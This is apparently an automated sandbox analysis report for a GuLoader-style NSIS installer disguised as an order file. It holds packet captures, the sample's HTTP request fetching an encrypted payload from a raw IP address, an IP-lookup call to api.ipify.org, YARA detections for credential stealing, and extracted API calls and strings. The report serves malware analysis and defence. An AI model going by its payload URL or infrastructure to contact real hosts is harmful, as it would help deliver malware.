Jul 1, 2024 12:10:22.883254051 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883291006 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883378029 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883459091 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.883466005 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883491993 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883503914 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883516073 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883522987 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.883533001 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883553982 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883564949 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883575916 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883589029 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.883589029 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.883621931 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.883713961 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.883860111 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884099960 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884151936 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884165049 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884200096 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884212971 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884224892 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884248018 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884259939 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884272099 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884277105 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884300947 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884314060 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884325981 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884327888 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884356022 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884371042 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884383917 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884406090 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884406090 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884423018 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884434938 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884447098 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884459972 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884470940 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884473085 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884494066 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884506941 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884519100 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884556055 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884568930 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884581089 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884601116 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884613037 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884624958 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884654999 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884665966 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884665966 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884763956 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884776115 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884813070 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884823084 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884826899 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884876013 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884886980 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.884927988 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.884941101 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885035038 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885042906 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885051012 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885063887 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885077000 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885121107 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885127068 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885173082 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885183096 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885198116 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885210037 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885276079 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885328054 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885344028 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885356903 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885369062 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885407925 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885426044 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885440111 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885452032 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885459900 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885459900 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885466099 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885487080 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885499001 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885508060 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885552883 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885556936 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885571003 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885658026 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885745049 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.885746956 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885802031 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.885914087 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.886121988 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:24.622785091 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:24.622872114 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:24.623226881 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:24.661750078 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:24.661777973 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:24.916212082 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:24.916439056 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:24.918631077 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:24.918653011 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:24.919306993 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:24.955771923 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:24.996190071 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:25.209517956 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:25.209583998 CEST	443	54358	172.67.74.152	192.168.11.30
Jul 1, 2024 12:10:25.209731102 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:10:25.210421085 CEST	54358	443	192.168.11.30	172.67.74.152
Jul 1, 2024 12:12:11.178637028 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:12:11.419455051 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:12:11.419737101 CEST	54357	80	192.168.11.30	109.248.151.29

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 12:10:24.498366117 CEST	49232	53	192.168.11.30	1.1.1.1
Jul 1, 2024 12:10:24.617609978 CEST	53	49232	1.1.1.1	192.168.11.30

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 1, 2024 12:10:24.498366117 CEST	192.168.11.30	1.1.1.1	0xfaa0	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 1, 2024 12:10:24.617609978 CEST	1.1.1.1	192.168.11.30	0xfaa0	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 1, 2024 12:10:24.617609978 CEST	1.1.1.1	192.168.11.30	0xfaa0	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 1, 2024 12:10:24.617609978 CEST	1.1.1.1	192.168.11.30	0xfaa0	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

109.248.151.29

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	54357	109.248.151.29	80	8160	C:\Users\user\Desktop\Order 00293884800595.bat.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 12:10:21.427661896 CEST	183	OUT	GET /DttVKmqMztLpGMCsim17.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 109.248.151.29 Cache-Control: no-cache
Jul 1, 2024 12:10:21.670203924 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 01 Jul 2024 05:34:18 GMT Accept-Ranges: bytes ETag: "b36ad05178cbda1:0" Server: Microsoft-IIS/8.5 Date: Mon, 01 Jul 2024 10:10:21 GMT Content-Length: 241728 Data Raw: 9e 20 0c 55 35 64 80 37 86 7b 7e 63 78 44 c1 6b 85 3e 06 91 d8 2d 01 9b 34 a5 3c 76 da 6c 68 a5 a0 89 70 a7 81 12 3a 6a 8c 01 c5 c8 01 73 00 70 76 69 d7 de 8b c1 e8 c0 0f 15 c9 80 e3 1f 9e fb 3d 47 98 7f 6f 5d 27 a9 58 78 94 ee ab 21 89 86 e9 a7 56 3b 6d a1 7b 3a 4b b5 e5 0e 12 ee fe 20 26 25 84 cb 88 34 cc 43 48 d3 37 e3 c9 4a 8d cc 14 15 d2 30 eb 24 40 bc 81 50 b8 84 92 61 01 fc 31 7a 2e de aa e0 b4 bb 81 8f ac ac 07 0f 1f 33 d8 09 5c f1 9c d9 aa e9 b2 b1 bf 4c 49 d1 08 38 5b 2a 03 a8 ef 13 a2 e3 7b de f9 75 60 83 5f 8f d6 e4 e7 90 6f 50 8d 84 bf 57 5d b1 6d ee d5 56 ec 09 ca 57 c1 cf 2a b9 09 a4 00 28 e2 e3 ce ad c4 56 c5 a2 ab b7 e1 ca 2c 43 27 5a 5a fe 89 ea 89 eb da 78 3a d6 e2 e7 b0 47 d1 26 a5 69 de 71 e5 b2 66 9d 4a 52 41 91 20 b2 b8 8b 93 4c bd e8 67 34 5c b3 36 7d 70 ca fe cd 8b 32 28 00 6b 4c a8 a5 08 6a 50 1e e8 43 57 65 ea 5e f9 74 c4 b8 df f2 8a 67 83 63 19 c2 7c 0e 3b 19 c3 07 bc 4d bb 69 29 96 be 9d c5 aa 86 3c 0b 37 e2 6d 9d 6e fa eb e9 5d 7d c5 f3 ab 17 a2 a5 06 b3 7f d8 c4 50 18 [TRUNCATED] Data Ascii: U5d7{~cxDk>-4<vlhp:jspvi=Go]'Xx!V;m{:K &%4CH7J0$@Pa1z.3\LI8[{u`_oPW]mVW(V,C'ZZx:G&iqfJRA Lg4\6}p2(kLjPCWe^tgc\|;Mi)<7mn]}P+@JXg}0LJtI"mJ,_lX0lJY6\|-B&7()c:r_2 a0fw?nRH7]Ra}\Y\<8oW.rzL6)}pj^<{tv^:?,3xW [z;pC'{iCf]H\RKA(3$~:a7"C5"=ou"#dR-b(>}al9_AO5,:F"l@&K}"("+8$D&\kJ#$@J\8F~K2?B&eMo(HNS`R/"l~aW<yf}58=T76@_d~x1CS4<<TrhvJxIhxT?VfI=_K8FL-(s4%T`jf0 }.wJl0!h}A"s.s9i0 [TRUNCATED]
Jul 1, 2024 12:10:21.670219898 CEST	1289	IN	Data Raw: 31 f2 3e c9 a8 2a 17 f4 d2 51 c7 59 8f 7a 19 72 d3 73 26 3c 96 38 b2 9d 6f a7 ee d0 c9 8f a2 fb 27 10 f7 0f 9b 32 01 ec ca a2 37 88 eb 6a fc 31 c8 21 e0 d4 0d 48 fe 8b 98 92 4a f1 cf 10 5a 23 ab b5 47 4e 9a e5 71 05 a3 e3 0b 82 87 bc 23 7a ad b5 Data Ascii: 1>QYzrs&<8o'27j1!HJZ#GNq#zNnY8f!dTXM}7`j`%]qQBFt'&3sx1>}}-5`3Z$@C6,Y^>an8P((8,dfb(2tPz8@K]XX
Jul 1, 2024 12:10:21.670248032 CEST	1289	IN	Data Raw: 9d 26 ae ec 91 fe d8 e3 b9 0b e6 93 52 5c f6 ce 82 b8 26 0b 66 24 82 b5 9c 46 cd 1c de c3 66 83 8e 3a 98 ba f0 f1 77 c7 9f cc 2b f6 3e 18 72 95 d6 37 7e 74 53 c3 e3 9f 60 df 7a 46 fd 72 29 1a 8d 27 74 e6 cc ea 48 41 eb 09 c5 00 50 fa 4e 15 42 3c Data Ascii: &R\&f$Ff:w+>r7~tS`zFr)'tHAPNB<@GOC"^;}Rbyn:hCvI_\|RU`71r(vL&HW&WOwfU[tj5kL~pAneuV JDY<)`
Jul 1, 2024 12:10:21.670382977 CEST	1289	IN	Data Raw: cb c3 6c 7b cf b8 63 3c 09 8e 87 34 5b c9 41 81 ca 14 ac a3 b7 fe 91 73 b7 a0 eb cd 61 90 a9 70 31 61 db ba 00 b0 35 91 6a 64 a2 b2 2f 95 24 46 60 f0 22 4a 31 53 a0 fa 88 12 8a 50 cf 98 bd 94 c6 fa 25 9a 87 96 47 e6 27 42 81 84 28 3d a7 ff ff 98 Data Ascii: l{c<4[Asap1a5jd/$F`"J1SP%G'B(=_<}eQ#ZfOS0m{;)<W vxE&`\|Kb8+r>r7~tX`gl)'t(qmj:J<ai$w1
Jul 1, 2024 12:10:21.911412001 CEST	1289	IN	Data Raw: 90 96 00 7e c4 6f 37 1c 22 bd ec 35 11 c5 a5 ae 89 9c 53 23 04 85 6f cb ae ec 70 8f fa 22 90 14 dd 5c 3a 34 0f 64 fd a8 ba e8 81 17 ea c5 ac 1a cf b0 70 f6 68 d6 95 8e de f0 65 91 df d9 cf 72 3e 9f ad 5b 23 16 1f 54 a2 4e 17 a1 3d eb d4 4b e3 1c Data Ascii: ~o7"5S#op"\:4dpher>[#TN=KTn>~'n"%elM&Du`^Fey"0ZlnrEn<3Hq%`r?n^ebK.RDiY0-'WCG%x_$_0r
Jul 1, 2024 12:10:21.911449909 CEST	1289	IN	Data Raw: f7 33 6a f5 72 2e 48 37 3d 5d 25 f6 f2 06 7e 74 5c 1f 81 a3 91 bc bc b9 77 0b 1c fd 36 71 6e 0f 6b 01 77 2c 72 9d cf 08 c2 4c 36 59 33 c3 98 74 c0 64 d3 8f 8e 31 77 16 89 1f de f3 75 71 fd 8c f6 19 1a 7c 4b 3a 91 67 83 3b e9 ab 39 1b 86 5b de 95 Data Ascii: 3jr.H7=]%~t\w6qnkw,rL6Y3td1wuq\|K:g;9[j gv?pk'qACl3zj[]B^z]G)5+>~<;",5PMou#dEqzhpews.aY#6YDpK%T1"{6nz"
Jul 1, 2024 12:10:21.911561012 CEST	1289	IN	Data Raw: ab 17 62 ab 06 f5 7a 55 f1 50 18 2a be e3 4b 11 b5 5a 87 d8 ea 00 69 f1 c5 a4 7a a5 0f fe 97 a5 7d 30 8a f4 4d a3 da d7 e8 f3 f2 b6 4b 1e 2e f3 74 11 49 50 1e e7 b2 6f e8 99 dc 2c dd 9e a1 dc d0 b6 6c 5c f7 ce 58 25 39 6c e5 08 38 4b 60 dd 36 7c Data Ascii: bzUP*KZiz}0MK.tIPo,l\X%9l8K`6\|(!E7+-z:r0'TXa8ffk)2nRF4=#,y\/=oW\ql3)=j~Dq2_ udR;?,xW ]XZ6pC
Jul 1, 2024 12:10:21.911597013 CEST	1289	IN	Data Raw: 8e e9 1c 5f b1 1d 4c f5 47 bc 4c ca a9 83 cd 29 b9 0b 43 23 4e c2 ea ce ad c4 a8 c4 9b 53 b7 e3 cb d9 4e 2d 5a 7a 5f 8a ea 89 cb e3 78 3a dc 40 c7 54 82 d2 26 5b 47 dd 71 e5 ac 69 9e 4a 72 01 91 20 92 46 8a aa 44 bd e8 63 34 7c b2 36 7d 70 34 f4 Data Ascii: _LGL)C#NSN-Zz_x:@T&[GqiJr FDc4\|6}p42hLjPzRe^q=\|\|}ik-+7m`/eZPARXyG6L<DFwI"J_lX@JY>8}b&
Jul 1, 2024 12:10:21.911633015 CEST	1289	IN	Data Raw: 1f ae 7e 3f 8d 15 90 22 7c 44 45 7b 22 73 e6 cd 12 a3 c4 b5 97 d6 ee a8 cd 49 13 08 7f 6c 65 9e ac 5c 78 b4 f8 54 de 89 78 5f ab 56 3b 93 ad 77 3a 2b a7 e5 0e 12 10 ff 19 3d 25 84 cb 76 38 c8 43 60 97 37 e3 c3 c6 ce cc 14 14 2c 3e eb 24 60 af 81 Data Ascii: ~?"\|DE{"sIle\xTx_V;w:+=%v8C`7,>$`PzmiKv.K[Ovx"'(FW/asWu!EA]pT]+\BBW).B0VK5&{ZZXtG:_&iqR=RRcR6}!(kjPSe
Jul 1, 2024 12:10:21.911660910 CEST	1289	IN	Data Raw: 8d 87 35 52 63 57 a3 3f 45 a4 76 13 4f bd c4 d1 e7 63 74 0b 6c 8b 87 39 e2 0a d7 f5 13 cc 70 c2 07 2a 01 26 cc dd 0b 3c 30 8e 2a 5e 7e cf a1 d8 fa 81 34 22 81 89 9d 1b 72 9e d1 6d 0d f3 8b 80 14 6c d0 1e 09 d9 f4 7e f9 90 da 8b f4 76 83 6b 49 7e Data Ascii: 5RcW?EvOctl9p&<0^~4"rml~vkI~qZ6O&pR.2Z"y(r<*rlZ?"\|DE{"sIl]\xZZ;M{:K7 ,J%0$@P2a?lv7
Jul 1, 2024 12:10:21.911681890 CEST	1289	IN	Data Raw: f7 ea ea 76 7b a8 d9 98 22 19 59 05 d4 0e 4f e2 13 1a b7 5b cc 5e 98 f3 64 2d 17 f3 7c 83 e5 ef 55 0c 20 22 84 4a 7d 1a 03 f3 24 f9 a3 4c c0 f6 e9 2f 98 0e 06 7e 73 42 98 76 fc c8 2c fc 51 80 06 89 02 1e 3a 08 40 6f d0 a0 2a 02 7a 72 34 4f 45 8f Data Ascii: v{"YO[^d-\|U "J}$L/~sBv,Q:@ozr4OEdwU^qC OYW"N&Tl2h-=bpGdKf(/!z9RcW_u8ouM(<\|$}r_-?D%&F~e\*}Z7m.O

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	54358	172.67.74.152	443	8160	C:\Users\user\Desktop\Order 00293884800595.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 10:10:24 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-07-01 10:10:25 UTC	211	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 10:10:25 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89c59b2b0c2c6207-ORD
2024-07-01 10:10:25 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39 Data Ascii: 81.181.62.99

Target ID:	5
Start time:	06:10:03
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order 00293884800595.bat.exe"
Imagebase:	0x400000
File size:	507'437 bytes
MD5 hash:	EFD3BF2442D368363512548564A51050
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1802216811117.0000000005184000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:10:13
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order 00293884800595.bat.exe"
Imagebase:	0x400000
File size:	507'437 bytes
MD5 hash:	EFD3BF2442D368363512548564A51050
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1807122448137.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.2%
Total number of Nodes:	1551
Total number of Limit Nodes:	41

Executed Functions

Function 004033D8 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 430
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004033FB
GetVersionExA.KERNEL32(?), ref: 00403424
GetVersionExA.KERNEL32(0000009C), ref: 0040343B
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
#17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
OleInitialize.OLE32(00000000), ref: 00403548
SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
GetCommandLineA.KERNEL32(humpende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",00000020,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
ExitProcess.KERNEL32 ref: 004037E0
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
wsprintfA.USER32 ref: 00403846
GetFileAttributesA.KERNEL32(00431400,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 00403878
DeleteFileA.KERNEL32(00431400), ref: 00403884
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 004038B0
CopyFileA.KERNEL32(C:\Users\user\Desktop\Order 00293884800595.bat.exe,00431400,00000001), ref: 004038C6
CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
ExitProcess.KERNEL32 ref: 004039B6

Strings

NSIS Error, xrefs: 0040356C
Error launching installer, xrefs: 00403778
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes, xrefs: 00403693, 00403792, 00403803, 00403811
C:\Users\user\AppData\Local\Temp\, xrefs: 004036A3, 004036A8, 004036BE, 004036CA, 004036D9, 004036E6, 004036F2, 004036FA, 004037EB, 00403864, 00403890, 004038AF, 004038B8
~nsu%X.tmp, xrefs: 0040383E
Low, xrefs: 004036E1
TEMP, xrefs: 004036F3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne, xrefs: 0040379D
TMP, xrefs: 004036FB
"C:\Users\user\Desktop\Order 00293884800595.bat.exe", xrefs: 00403581, 00403587, 00403736
`K@v, xrefs: 004036EC
humpende Setup, xrefs: 00403571
", xrefs: 004035D8
C:\Users\user\Desktop\Order 00293884800595.bat.exe, xrefs: 004038C1
UXTHEME, xrefs: 004034F8, 004034FD, 00403503
1033, xrefs: 0040370F
\Temp, xrefs: 004036C5
SeShutdownPrivilege, xrefs: 0040394B
C:\Users\user\Desktop, xrefs: 0040380C
A, xrefs: 00403476

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

